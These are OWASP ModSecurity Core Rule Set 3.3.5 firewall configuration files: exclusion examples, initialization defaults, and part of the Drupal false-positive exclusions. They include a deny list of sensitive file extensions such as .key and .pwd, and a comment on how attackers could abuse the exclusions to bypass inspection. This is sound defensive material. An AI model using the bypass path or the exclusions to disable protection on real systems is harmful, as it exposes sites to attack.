# # As a general rule: # ctl:ruleEngine -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveTargetById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveTargetByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveTargetByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # # SecRuleRemoveById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleRemoveByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleRemoveByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleUpdateActionById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleUpdateTargetById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleUpdateTargetByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleUpdateTargetByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # # # What follows are a group of examples that show you how to perform rule # exclusions. # # # Example Exclusion Rule: Disable inspection for an authorized client # # This ruleset allows you to control how ModSecurity will handle traffic # originating from Authorized Vulnerability Scanning (AVS) sources. 
See # related blog post - # http://blog.spiderlabs.com/2010/12/advanced-topic-of-the-week-handling-authorized-scanning-traffic.html # # White-list ASV network block (no blocking or logging of AVS traffic). Update # the IP network block as appropriate for your AVS traffic. # # Note that ctl:ruleEngine=Off turns off all rule processing for the matching # transaction, so keep the address list as narrow as possible. If ModSecurity # runs behind a reverse proxy or load balancer, confirm that REMOTE_ADDR holds # the scanner's address and not the proxy's before relying on this rule. # # ModSec Rule Exclusion: Disable Rule Engine for known ASV IP # SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \ # "id:1000,\ # phase:1,\ # pass,\ # nolog,\ # ctl:ruleEngine=Off" # # # Example Exclusion Rule: Removing a specific ARGS parameter from inspection # for an individual rule # # This rule shows how to conditionally exclude the "password" # parameter for rule 942100 when the REQUEST_URI begins with /index.php # ModSecurity Rule Exclusion: 942100 SQL Injection Detected via libinjection # # SecRule REQUEST_URI "@beginsWith /index.php" \ # "id:1001,\ # phase:1,\ # pass,\ # nolog,\ # ctl:ruleRemoveTargetById=942100;ARGS:password" # # # Example Exclusion Rule: Removing a specific ARGS parameter from inspection # for only certain attacks # # Attack rules within the CRS are tagged, with tags such as 'attack-lfi', # 'attack-sqli', 'attack-xss', 'attack-injection-php', et cetera. # # ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd # for all rules tagged attack-sqli # SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ # "id:1002,\ # phase:2,\ # pass,\ # nolog,\ # ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:pwd" # # Example Exclusion Rule: Removing a specific ARGS parameter from inspection # for all CRS rules # # This rule illustrates that we can use tagging very effectively to whitelist a # common false positive across an entire ModSecurity instance. This can be done # because every rule in OWASP_CRS is tagged with OWASP_CRS. This will NOT # affect custom rules. 
# # ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd # for all CRS rules # SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ # "id:1003,\ # phase:2,\ # pass,\ # nolog,\ # ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd" # # Example Exclusion Rule: Removing a range of rules # # This rule illustrates that we can remove a rule range via a ctl action. # This relies on the fact that rules are grouped by topic in rule files covering # a certain id range. # # ModSecurity Rule Exclusion: Disable all SQLi and XSS rules # SecRule REQUEST_FILENAME "@beginsWith /admin" \ # "id:1004,\ # phase:2,\ # pass,\ # nolog,\ # ctl:ruleRemoveById=941000-942999" # # # The application specific rule exclusion files # REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf # REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf # bring additional examples which can be useful when tuning a service. modsecurity-crs-3.3.5/rules/REQUEST-901-INITIALIZATION.conf000066400000000000000000000331151446122515100224470ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # This file REQUEST-901-INITIALIZATION.conf initializes the Core Rules # and performs preparatory actions. It also fixes errors and omissions # of variable definitions in the file crs-setup.conf. # The crs-setup.conf file can and should be edited by the user; this file # is part of the CRS installation and should not be altered. 
#
#
# -=[ Rules Version ]=-
#
# Rule version data is added to the "Producer" line of Section H of the Audit log:
#
# - Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.1.0.
#
# (The line above is an example; the CRS part of it is the string passed to
# SecComponentSignature below.)
#
# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature
#
SecComponentSignature "OWASP_CRS/3.3.5"

#
# -=[ Setup version check ]=-
#
# The CRS checks the tx.crs_setup_version variable to ensure that the setup
# file is included at the correct time. This detects situations where
# necessary settings are not defined, for instance if the file
# inclusion order is incorrect, or if the user has forgotten to
# include the crs-setup.conf file.
#
# If you are upgrading from an earlier version of the CRS and you are
# getting this error, please make a new copy of the setup template
# crs-setup.conf.example to crs-setup.conf, and re-apply your policy
# changes. There have been many changes in settings syntax from CRS2
# to CRS3, so an old setup file may cause unwanted behavior.
#
# If you are not planning to use the crs-setup.conf template, you must
# manually set the tx.crs_setup_version variable before including
# the CRS rules/* files.
#
# The variable is a numerical representation of the CRS version number.
# E.g., v3.0.0 is represented as 300.
#
# The rule counts the variable (&TX:crs_setup_version) and fires when the count
# is 0, i.e. when the variable has not been set at all. It then denies the
# request in phase 1 with status 500 and writes both an error log and an audit
# log entry, so a missing setup file stops traffic instead of letting it pass
# with undefined settings.
#
SecRule &TX:crs_setup_version "@eq 0" \
    "id:901001,\
    phase:1,\
    deny,\
    status:500,\
    log,\
    auditlog,\
    msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
    ver:'OWASP_CRS/3.3.5',\
    severity:'CRITICAL'"


#
# -=[ Default setup values ]=-
#
# Some constructs or individual rules will fail if certain parameters
# are not set in the crs-setup.conf file. The following rules will catch
# these cases and assign sane default values.
#
# Every rule in this section tests the variable count (&TX:name "@eq 0"), so a
# default is assigned only when crs-setup.conf left the variable unset. A value
# set in crs-setup.conf is never overwritten here.

# Default Inbound Anomaly Threshold Level (rule 900110 in crs-setup.conf)
SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \
    "id:901100,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.inbound_anomaly_score_threshold=5'"

# Default Outbound Anomaly Threshold Level (rule 900110 in crs-setup.conf)
SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \
    "id:901110,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.outbound_anomaly_score_threshold=4'"

# Default Paranoia Level (rule 900000 in crs-setup.conf)
SecRule &TX:paranoia_level "@eq 0" \
    "id:901120,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.paranoia_level=1'"

# Default Executing Paranoia Level (rule 900000 in crs-setup.conf)
# When unset, it is copied from tx.paranoia_level, which rule 901120 above has
# already defaulted if necessary.
SecRule &TX:executing_paranoia_level "@eq 0" \
    "id:901125,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.executing_paranoia_level=%{TX.PARANOIA_LEVEL}'"

# Default Sampling Percentage (rule 900400 in crs-setup.conf)
# 100 means no sampling: every request is sent into the Core Rules.
SecRule &TX:sampling_percentage "@eq 0" \
    "id:901130,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.sampling_percentage=100'"

# Default Anomaly Scores (rule 900100 in crs-setup.conf)
# One score per severity: critical=5, error=4, warning=3, notice=2.
SecRule &TX:critical_anomaly_score "@eq 0" \
    "id:901140,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.critical_anomaly_score=5'"

SecRule &TX:error_anomaly_score "@eq 0" \
    "id:901141,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.error_anomaly_score=4'"

SecRule &TX:warning_anomaly_score "@eq 0" \
    "id:901142,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.warning_anomaly_score=3'"

SecRule &TX:notice_anomaly_score "@eq 0" \
    "id:901143,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.notice_anomaly_score=2'"

# Default do_reput_block
# 0 leaves blocking based on IP reputation switched off.
SecRule &TX:do_reput_block "@eq 0" \
    "id:901150,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.do_reput_block=0'"

# Default block duration
SecRule &TX:reput_block_duration "@eq 0" \
    "id:901152,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.reput_block_duration=300'"

# Default HTTP policy: allowed_methods (rule 900200)
SecRule &TX:allowed_methods "@eq 0" \
    "id:901160,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"

# Default HTTP policy: allowed_request_content_type (rule 900220)
# Each content type is wrapped in '|' delimiters.
SecRule &TX:allowed_request_content_type "@eq 0" \
    "id:901162,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'"

# Default HTTP policy: allowed_request_content_type_charset (rule 900270)
SecRule &TX:allowed_request_content_type_charset "@eq 0" \
    "id:901168,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'"

# Default HTTP policy: allowed_http_versions (rule 900230)
SecRule &TX:allowed_http_versions "@eq 0" \
    "id:901163,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'"

# Default HTTP policy: restricted_extensions (rule 900240)
# Each extension is terminated by '/'.
SecRule &TX:restricted_extensions "@eq 0" \
    "id:901164,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"

# Default HTTP policy: restricted_headers (rule 900250)
# Each header name is wrapped in '/' delimiters.
SecRule &TX:restricted_headers "@eq 0" \
    "id:901165,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.restricted_headers=/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/'"

# Default HTTP policy: static_extensions (rule 900260)
SecRule &TX:static_extensions "@eq 0" \
    "id:901166,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'"

# Default enforcing of body processor URLENCODED
# 0 leaves the forced URLENCODED body processor (rule 901350) disabled.
SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \
    "id:901167,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.enforce_bodyproc_urlencoded=0'"

# Default check for UTF8 encoding validation
SecRule &TX:crs_validate_utf8_encoding "@eq 0" \
    "id:901169,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.crs_validate_utf8_encoding=0'"

# Default monitor_anomaly_score value
SecRule &TX:monitor_anomaly_score "@eq 0" \
    "id:901170,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.monitor_anomaly_score=0'"


#
# -=[ Initialize internal variables ]=-
#

# Initialize anomaly scoring variables.
# All _score variables start at 0, and are incremented by the various rules
# upon detection of a possible attack.
# sql_error_match is used for shortcutting rules for performance reasons.
# Unconditional reset: every transaction starts with all scores and the
# sql_error_match shortcut flag at 0.
SecAction \
    "id:901200,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.anomaly_score=0',\
    setvar:'tx.anomaly_score_pl1=0',\
    setvar:'tx.anomaly_score_pl2=0',\
    setvar:'tx.anomaly_score_pl3=0',\
    setvar:'tx.anomaly_score_pl4=0',\
    setvar:'tx.sql_injection_score=0',\
    setvar:'tx.xss_score=0',\
    setvar:'tx.rfi_score=0',\
    setvar:'tx.lfi_score=0',\
    setvar:'tx.rce_score=0',\
    setvar:'tx.php_injection_score=0',\
    setvar:'tx.http_violation_score=0',\
    setvar:'tx.session_fixation_score=0',\
    setvar:'tx.inbound_anomaly_score=0',\
    setvar:'tx.outbound_anomaly_score=0',\
    setvar:'tx.outbound_anomaly_score_pl1=0',\
    setvar:'tx.outbound_anomaly_score_pl2=0',\
    setvar:'tx.outbound_anomaly_score_pl3=0',\
    setvar:'tx.outbound_anomaly_score_pl4=0',\
    setvar:'tx.sql_error_match=0'"


#
# -=[ Initialize collections ]=-
#
# Create both Global and IP collections for rules to use.
# There are some CRS rules that assume that these two collections
# have already been initiated.
#

# Store a SHA-1 hash (hex encoded) of the User-Agent header in tx.ua_hash.
SecRule REQUEST_HEADERS:User-Agent "@rx ^.*$" \
    "id:901318,\
    phase:1,\
    pass,\
    t:none,t:sha1,t:hexEncode,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'tx.ua_hash=%{MATCHED_VAR}'"

# The IP collection key is the client address joined with tx.ua_hash, so the
# persistent per-client record (ip.*) is kept per address and User-Agent pair,
# not per address alone.
# NOTE(review): anything that relies on ip.* state is therefore scoped to that
# pair; take this into account when sizing thresholds and block durations.
# tx.real_ip is set to the same REMOTE_ADDR value.
SecAction \
    "id:901321,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    initcol:global=global,\
    initcol:ip=%{remote_addr}_%{tx.ua_hash},\
    setvar:'tx.real_ip=%{remote_addr}'"

#
# -=[ Initialize Correct Body Processing ]=-
#
# Force request body variable and optionally request body processor
#

# Force body variable
# Fires when REQBODY_PROCESSOR does not match URLENCODED, MULTIPART, XML or
# JSON, and switches forceRequestBodyVariable on for the transaction.
SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
    "id:901340,\
    phase:1,\
    pass,\
    nolog,\
    noauditlog,\
    msg:'Enabling body inspection',\
    ctl:forceRequestBodyVariable=On,\
    ver:'OWASP_CRS/3.3.5'"

# Force body processor URLENCODED
# Chained rule: only when tx.enforce_bodyproc_urlencoded is 1 AND no known body
# processor is selected, the URLENCODED processor is assigned.
SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \
    "id:901350,\
    phase:1,\
    pass,\
    t:none,t:urlDecodeUni,\
    nolog,\
    noauditlog,\
    msg:'Enabling forced body inspection for ASCII content',\
    ver:'OWASP_CRS/3.3.5',\
    chain"
    SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \
        "ctl:requestBodyProcessor=URLENCODED"


#
# -=[ Easing In / Sampling Percentage ]=-
#
# This is used to send only a limited percentage of requests into the Core
# Rule Set. The selection is based on TX.sampling_percentage and a pseudo
# random number calculated below.
#
# Use this to ease into a new Core Rules installation with an existing
# productive service.
#
# See
# https://www.netnea.com/cms/2016/04/26/easing-in-conditional-modsecurity-rule-execution-based-on-pseudo-random-numbers/
#

#
# Generate the pseudo random number
#
# ATTENTION: This is no cryptographically secure random number. It's just
# a cheap way to get some random number suitable for sampling.
#
# We take the entropy contained in the UNIQUE_ID. We hash that variable and
# take the first integer numbers out of it. Theoretically, it is possible
# there are no integers in a sha1 hash. We make sure we get two
# integer numbers by taking the last two digits from the DURATION counter
# (in microseconds).
# Finally, leading zeros are removed from the two-digit random number.
#

# With the default of 100 the whole sampling block is skipped (jump to the
# END-SAMPLING marker), so no request is exempted from inspection.
SecRule TX:sampling_percentage "@eq 100" \
    "id:901400,\
    phase:1,\
    pass,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-SAMPLING"

# Step 1: hex-encoded SHA-1 of UNIQUE_ID.
SecRule UNIQUE_ID "@rx ^." \
    "id:901410,\
    phase:1,\
    pass,\
    t:sha1,t:hexEncode,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'TX.sampling_rnd100=%{MATCHED_VAR}'"

# Step 2: append the last two characters of DURATION.
SecRule DURATION "@rx (..)$" \
    "id:901420,\
    phase:1,\
    pass,\
    capture,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'TX.sampling_rnd100=%{TX.sampling_rnd100}%{TX.1}'"

# Step 3: keep the first two decimal digits, skipping the hex letters a-f.
SecRule TX:sampling_rnd100 "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \
    "id:901430,\
    phase:1,\
    pass,\
    capture,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'"

# Step 4: strip a leading zero, leaving a number from 0 to 99.
SecRule TX:sampling_rnd100 "@rx ^0([0-9])" \
    "id:901440,\
    phase:1,\
    pass,\
    capture,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    setvar:'TX.sampling_rnd100=%{TX.1}'"


#
# Sampling decision
#
# If a request is allowed to pass without being checked by the CRS, there is no
# entry in the audit log (for performance reasons), but an error log entry is
# being written. If you want to disable the error log entry, then issue the
# following directive somewhere after the inclusion of the CRS
# (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf).
#
# SecRuleUpdateActionById 901450 "nolog"
#
# The rule fires when the random number is NOT lower than
# tx.sampling_percentage. ctl:ruleEngine=Off then switches the rule engine off
# for this transaction, so the request is not inspected by any later rule.
# Keep the error log entry unless the volume is a problem: it is the only
# record of which requests went uninspected.
#
SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \
    "id:901450,\
    phase:1,\
    pass,\
    log,\
    noauditlog,\
    msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\
    ctl:ruleEngine=Off,\
    ver:'OWASP_CRS/3.3.5'"

SecMarker "END-SAMPLING"


#
# Configuration Plausibility Checks
#

# Make sure executing paranoia level is not lower than paranoia level
# A misconfiguration here denies every request with status 500 and logs the
# reason, rather than running with an inconsistent setup.
SecRule TX:executing_paranoia_level "@lt %{tx.paranoia_level}" \
    "id:901500,\
    phase:1,\
    deny,\
    status:500,\
    t:none,\
    log,\
    msg:'Executing paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\
    ver:'OWASP_CRS/3.3.5'"
modsecurity-crs-3.3.5/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf000066400000000000000000000324711446122515100241440ustar00rootroot00000000000000# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.5
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------

# These exclusions remedy false positives in a default Drupal install.
# The exclusions are only active if crs_exclusions_drupal=1 is set.
# See rule 900130 in crs-setup.conf.example for instructions.
#
# [ POLICY ]
#
# Drupal is a complex application that is hard to secure with the CRS. This set
# of exclusion rules aims to sanitise the CRS in a way that allows a default
# Drupal setup to be installed and configured without much hassle as far as
# ModSecurity and the CRS are concerned.
#
# The exclusion rules are fairly straight forward in the sense that they
# disable CRS on a set of well-known parameter fields that are often the source
# of false positives / false alarms of the CRS. This includes namely the
# session cookie, the password fields and article/node bodies.
#
# This is based on two assumptions:
# - You have a basic trust in your authenticated users who are allowed to
#   edit nodes.
# - Drupal allows html content in nodes and it protects your users from
#   attacks via these fields.
#
# If you think these assumptions are wrong or if you would prefer a more
# careful/secure approach, you can disable the exclusion rules handling of said
# node body false positives. Do this by placing the following directive in
# RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.
# # SecRuleRemoveById 9001200-9001299 # # This will mean the CRS remain intact for the editing of node bodies. # # The exclusion rules in this file work without the need to define a Drupal # installation path prefix. Instead they look at the URI from the end - or # they use regular expressions when targeting dynamic URL. This is all not # totally foolproof. In some cases, an advanced attacker might be able to # doctor a request in a way that one of these exclusion rules is triggered # and the request will bypass all further inspection despite not being a # Drupal request at all. These exclusion rules could thus be leveraged to # disable the CRS completely. This is why these rules are off by default. # # The CRS rules covered by this ruleset are the rules with Paranoia Level 1 and # 2. If you chose to run Paranoia Level 3 or 4, you will be facing additional # false positives which you need to handle yourself. # # This set of exclusion rules does not cover any additional Drupal modules # outside of core. # # The exclusion rules are based on Drupal 8.1.10. # # And finally: This set of exclusion rules is in an experimental state. If you # encounter false positives with the basic Drupal functionality and they are # not covered by this rule file, then please report them. The aim is to be able # to install and run Drupal core in a seamless manner protected by # ModSecurity / CRS up to the paranoia level 2. 
# Guard rules, one per phase: when tx.crs_exclusions_drupal is unset (count 0)
# or set to 0, jump to the END-DRUPAL-RULE-EXCLUSIONS marker so that none of
# the exclusions below are applied.
SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \
    "id:9001000,\
    phase:1,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-DRUPAL-RULE-EXCLUSIONS"

SecRule &TX:crs_exclusions_drupal|TX:crs_exclusions_drupal "@eq 0" \
    "id:9001001,\
    phase:2,\
    pass,\
    t:none,\
    nolog,\
    ver:'OWASP_CRS/3.3.5',\
    skipAfter:END-DRUPAL-RULE-EXCLUSIONS"


# [ Table of Contents ]
#
# 9001100 Session Cookie
# 9001110 Password
# 9001120 Admin Settings (general)
# 9001130 FREE for use
# 9001140 Content and Descriptions
# 9001150 FREE for use
# 9001160 Form Token
# 9001170 Text Formats and Editors
# 9001180 WYSIWYG/CKEditor Assets and Upload
# 9001190 FREE for use
# 9001200 Content and Descriptions
#
# The rule id range from 9001200 to 9001999 is reserved for future
# use (Drupal plugins / modules).


# [ Session Cookie ]
#
# Giving the session cookie a dynamic name is most unfortunate
# from a ModSecurity perspective. The rule language does not allow
# us to disable rules in a granular way for individual cookies with
# dynamic names. So we need to disable the rule causing false positives
# for all cookies and their names.
#
# Rule Exclusion Session Cookie: 942450 SQL Hex Encoding Identified
#
# This is an unconditional SecAction: once the Drupal exclusions are enabled,
# rule 942450 stops inspecting REQUEST_COOKIES and REQUEST_COOKIES_NAMES on
# every request, not only on Drupal paths. Other rules keep inspecting cookies.
#
SecAction "id:9001100,\
    phase:2,\
    pass,\
    nolog,\
    ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES_NAMES,\
    ctl:ruleRemoveTargetById=942450;REQUEST_COOKIES,\
    ver:'OWASP_CRS/3.3.5'"


#
# [ Password ]
#
# Disable the CRS completely for all occurrences of passwords.
# SecRule REQUEST_FILENAME "@endsWith /core/install.php" \ "id:9001110,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:account[pass][pass2],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /user/login" \ "id:9001112,\ phase:2,\ pass,\ t:none,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/people/create" \ "id:9001114,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@rx /user/[0-9]+/edit$" \ "id:9001116,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:current_pass,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass1],\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass[pass2],\ ver:'OWASP_CRS/3.3.5'" # # [ Admin Settings (general) ] # # Disable known false positives for various fields used on admin pages. # # Rule Exclusion: 920271 Invalid character in request on multiple fields/paths # Rule Exclusion: 942430 Restricted SQL Character Anomaly Detection (args) # Disabled completely for admin/config pages # For the people/accounts page, we disable the CRS completely for a number of # freeform text fields. 
# SecRule REQUEST_FILENAME "@contains /admin/config/" \ "id:9001122,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveById=942430,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/config/people/accounts" \ "id:9001124,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveById=920271,\ ctl:ruleRemoveById=942440,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_cancel_confirm_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_password_reset_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_admin_created_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_no_approval_required_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_register_pending_approval_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_activated_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_blocked_body,\ ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:user_mail_status_canceled_body,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/configuration/single/import" \ "id:9001126,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveById=920271,\ ctl:ruleRemoveById=942440,\ ver:'OWASP_CRS/3.3.5'" SecRule REQUEST_FILENAME "@endsWith /admin/config/development/maintenance" \ "id:9001128,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveById=942440,\ ver:'OWASP_CRS/3.3.5'" # # # [ Content and Descriptions ] # # Disable known false positives for field "ids[]". # # Rule Exclusion: 942130 SQL Injection Attack: SQL Tautology Detected # SecRule REQUEST_FILENAME "@endsWith /contextual/render" \ "id:9001140,\ phase:2,\ pass,\ nolog,\ ctl:ruleRemoveTargetById=942130;ARGS:ids[],\ ver:'OWASP_CRS/3.3.5'" # # [ Form Token / Build ID ] # # Rule Exclusion for form_build_id: 942440 SQL Comment Sequence Detected on ... # Rule Exclusion for form_token: 942450 SQL Hex Encoding # Rule Exclusion for form_build_id: 942450 SQL Hex Encoding # # This is applied site-wide. 
#
# 9001160 is an unconditional SecAction: the three target removals below
# apply to every request that reaches phase 2 while this package is enabled,
# whatever the request path is.
SecAction "id:9001160,\
    phase:2,\
    pass,\
    nolog,\
    ctl:ruleRemoveTargetById=942440;ARGS:form_build_id,\
    ctl:ruleRemoveTargetById=942450;ARGS:form_token,\
    ctl:ruleRemoveTargetById=942450;ARGS:form_build_id,\
    ver:'OWASP_CRS/3.3.5'"


#
# [ Text Formats and Editors ]
#
# Disable the CRS completely for two fields triggering many, many rules
#
# Rule Exclusion for two fields: 942440 SQL Comment Sequence Detected
#
# The rule below removes both fields from every rule tagged OWASP_CRS (not
# only from 942440) on paths ending in the full_html format page.
#
SecRule REQUEST_FILENAME "@endsWith /admin/config/content/formats/manage/full_html" \
    "id:9001170,\
    phase:2,\
    pass,\
    nolog,\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:editor[settings][toolbar][button_groups],\
    ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filters[filter_html][settings][allowed_html],\
    ver:'OWASP_CRS/3.3.5'"


#
